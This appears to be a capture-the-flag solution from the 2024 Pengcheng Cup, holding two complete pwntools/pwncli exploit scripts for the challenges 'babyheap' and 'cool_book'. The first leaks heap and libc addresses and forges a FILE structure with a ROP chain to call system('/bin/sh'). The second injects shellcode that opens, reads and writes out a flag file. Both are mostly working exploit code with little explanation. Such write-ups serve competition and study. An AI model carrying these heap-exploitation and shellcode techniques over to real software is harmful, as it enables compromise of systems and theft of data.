鹏城杯2024

PWN

babyheap-pcb2024

#!/usr/bin/env python3
from pwncli import *
from ctypes import *
from struct import *

cli_script() # script mode requires this explicit call
# NOTE: `gift`, `context`, `LibcBox` and the I/O helpers used below all come from `from pwncli import *`.

# Many things can be pulled out of `gift`
io = gift["io"] # io object: pwn.process or pwn.remote
elf = gift["elf"] # ELF object, ELF("./pwn")
libc = gift.libc # ELF object, ELF("./libc.so.6")
filename = gift.filename # current filename
is_debug = gift.debug # is debug or not
is_remote = gift.remote # is remote or not
gdb_pid = gift.gdb_pid # gdb pid if debug



arch='amd64'
context(log_level = 'debug',os='linux',arch=arch)
if gift.remote:
    #libc = ELF("./libc.so.6")
    #gift['libc'] = libc
    # The libc served remotely sometimes differs from the local one; swap in the remote libc when running against the remote target.
    pass
libc_box = LibcBox() # LibcBox object (not referenced elsewhere in this script)

# Host libc loaded through ctypes and seeded; `r_l` is not used again in this script.
r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(1)
# - - - - - - - - - - - - - #
# Candidate offsets (named after one_gadget); not referenced elsewhere in this script.
onegadget = [0xebc81,0xebc85 ,0xebc88,0xebce2 ,0xebd38,0xebd3f,0xebd43]
# - - - - - - - - - - - - - #
def cmd(c):
    """Select menu option *c* once the prompt `inputs your choice:` arrives."""
    choice = str(c)
    sla("inputs your choice:", choice)
def add(idx, size, data=b'AAAA'):
    """Menu option 1: allocate slot *idx* with *size* bytes and send *data* as its content.

    The index and size are sent as decimal strings after their prompts; the
    content is sent raw (no trailing newline) after the content prompt.
    """
    cmd(1)
    for prompt, value in (("input idx:", idx), ("input size:", size)):
        sla(prompt, str(value))
    sa("input content:", data)
def free(idx):
    """Menu option 2: release the slot at *idx*."""
    cmd(2)
    slot = str(idx)
    sla("input idx:", slot)
def show(idx):
    """Menu option 3: ask the binary to print slot *idx*; the reply is left for the caller to read."""
    cmd(3)
    slot = str(idx)
    sla("input idx:", slot)
def edit(idx, data):
    """Menu option 4: select slot *idx*, then send *data* raw.

    No prompt is awaited before the content is written, unlike add().
    """
    cmd(4)
    slot = str(idx)
    sla("input idx:", slot)
    s(data)
# - - - - - - - - - - - - - #
def pwn_exp():
    """Run the scripted interaction against the challenge binary.

    Uses the module-level `io`, `libc`, `elf`, `log` and `CG` objects and the
    cmd/add/free/show/edit helpers. The only values computed here are
    `heap_base` and `libc.address`; `heap_base` and `elf.address` are logged
    at the end.
    """
    # Nine 0x400-byte allocations; free slots 0..6, then slot 7 (slot 8 is kept).
    for i in range(9):
        add(i,0x400)
    for i in range(7):
        free(i)
    free(7)
    # Slot 9: 0x11 bytes of 'A'. Reading it back, skip the first 0x10 'A's and
    # take the next 6 raw bytes as a little-endian value.
    add(9,0x40,b'A'*0x11)
    show(9)
    ru(b'A'*0x10)
    # The 17th 'A' (0x41) is the low byte of the value read back, so it is
    # subtracted out — presumes that byte is 0x00 in the real value; verify under gdb.
    heap_base = u64_ex(io.recv(6))-0x41
    # Slot 10: 8 'A' bytes, then 6 raw bytes after them.
    add(10,0x40,b'A'*0x8)
    show(10)
    ru(b'A'*0x8)
    # Both constants come from one observed run (their difference is 0x21ace0);
    # re-derive them if the libc build changes.
    libc.address = u64_ex(io.recv(6)) - 0x000078c237c1ace0 + 0x78c237a00000
    # Gadgets are searched in libc only: pop rdi; ret, a "/bin/sh" pointer, system.
    CG.set_find_area(find_in_elf=False,find_in_libc=True)
    p = p64_ex(CG.pop_rdi_ret())+p64_ex(CG.bin_sh())+p64_ex(libc.sym.system)
    add(11,0x400,p)
    # Build a FILE-shaped structure with the pwncli struct helper, anchored at _IO_2_1_stderr_.
    fake_addr = libc.sym._IO_2_1_stderr_
    pay = b''
    io_ = IO_FILE_plus_struct()
    io_.flags = 0
    io_.vtable = libc.sym._IO_wfile_jumps
    io_._IO_write_base = fake_addr
    io_._IO_write_ptr = fake_addr + 1
    io_._wide_data = fake_addr-0x30
    io_.chain = libc.sym.setcontext+61

    # Splice: struct bytes 0..111, heap_base-0x400 at offset 112, a ret gadget at 120,
    # struct bytes 128..175, fake_addr at 176, then the struct's tail from 184 on.
    # The offsets are fixed; if bytes(io_) is shorter than 184 the last slice is empty.
    bbb = bytes(io_)
    pay += bbb[:112]+p64_ex(heap_base-0x400)+p64_ex(CG.ret())+bbb[128:176]+p64_ex(fake_addr)+bytes(io_)[184:]
    # Negative slot index; where the binary places this write is not visible from here.
    edit(-4,pay)
    # b * _IO_wdoallocbuf+43   <- gdb breakpoint the author used while debugging
    # Menu option 1 followed by a raw '99' line, bypassing the add() helper.
    cmd(1)
    sl('99')

    #log
    log.info('#---#---#---#---#')
    #log.success('libc.address:'+hex(libc.address))
    log.success('elf.address:'+hex(elf.address))
    log.success('heap_bae:'+hex(heap_base))  # label typo ("heap_bae") is a runtime string, left as-is



if __name__ == '__main__':
    # Run the scripted interaction, then hand the connection over to the user.
    pwn_exp()
    io.interactive()

cool_book

#!/usr/bin/env python3
from pwncli import *
from ctypes import *
from struct import *

cli_script() # script mode requires this explicit call
# NOTE: `gift`, `context`, `LibcBox` and the I/O helpers used below all come from `from pwncli import *`.

# Many things can be pulled out of `gift`
io = gift["io"] # io object: pwn.process or pwn.remote
elf = gift["elf"] # ELF object, ELF("./pwn")
libc = gift.libc # ELF object, ELF("./libc.so.6")
filename = gift.filename # current filename
is_debug = gift.debug # is debug or not
is_remote = gift.remote # is remote or not
gdb_pid = gift.gdb_pid # gdb pid if debug



arch='amd64'
context(log_level = 'debug',os='linux',arch=arch)
if gift.remote:
    #libc = ELF("./libc.so.6")
    #gift['libc'] = libc
    # The libc served remotely sometimes differs from the local one; swap in the remote libc when running against the remote target.
    pass
libc_box = LibcBox() # LibcBox object (not referenced elsewhere in this script)

# Host libc loaded through ctypes and seeded; `r_l` is not used again in this script.
r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(1)
# - - - - - - - - - - - - - #

# - - - - - - - - - - - - - #
def cmd(c):
    """Select menu option *c* once the menu's last line (`3.exit`) has been printed."""
    choice = str(c)
    sla("3.exit", choice)
def add(idx, data=b'AAAA'):
    """Menu option 1: create slot *idx* and send *data* raw as its content."""
    cmd(1)
    slot = str(idx)
    sla("input idx", slot)
    sa("input content", data)
def free(idx):
    """Menu option 2: release the slot at *idx*."""
    cmd(2)
    slot = str(idx)
    sla("input idx", slot)
# - - - - - - - - - - - - - #
def pwn_exp():
    """Run the scripted interaction against the challenge binary.

    Parses the heap address the binary prints after "addr=", assembles three
    small x86-64 stubs with asm(), fills 48 slots, stores two stubs in slots
    48/49, chooses menu option 3, and after a pause() sends the third stub as
    a line. Uses the module-level `io`, `elf` and `log` objects.
    """
    # The binary prints a hex address after "addr="; parse it up to the newline.
    ru('addr=')
    heap_base = int(ru('\n'),16)

    # Stub 1: rdi = 0, rsi = heap_base, then a relative jump 61 bytes backwards.
    rr = asm('''
xor rdi,rdi
mov rsi,{}
jmp $-61
'''.format(heap_base))
    # Stub 2: copy esi into edx, issue a syscall, then call through rsi.
    rrr = asm('''
mov edx,esi
syscall
call rsi
''')
    # Stub 3: the 4-byte string "flag" is pushed onto the stack and rdi points at it.
    # Three syscalls follow: rax=2 (open) with rsi=rdx=0, rax=0 (read) 120 bytes from
    # fd 3 into the stack buffer, rax=1 (write) those 120 bytes to fd 1.
    orw = asm('''
mov rsp,rbp
push {}
mov rdi,rsp
xor rsi,rsi
xor rdx,rdx
mov rax,2
syscall
mov edi,3
mov rsi,rsp
mov rdx,120
mov rax,0
syscall
mov rdi,1
mov rsi,rsp
mov rdx,120
mov rax,1
syscall
'''.format(u64_ex('flag')))

    # Fill slots 0..47 with the default content, then store the two stubs.
    for i in range(48):
        add(i)

    print(len(rrr))  # debug output: size of stub 2 in bytes
    add(48,rrr)
    add(49,rr)
    # Menu option 3 ("exit"), wait for the user/debugger, then send stub 3 followed by a newline.
    cmd(3)
    pause()
    sl(orw)


    #log

    log.info('#---#---#---#---#')
    #log.success('libc.address:'+hex(libc.address))
    log.success('elf.address:'+hex(elf.address))
    log.success('heap_bae:'+hex(heap_base))  # label typo ("heap_bae") is a runtime string, left as-is



if __name__ == '__main__':
    # Run the scripted interaction, then hand the connection over to the user.
    pwn_exp()
    io.interactive()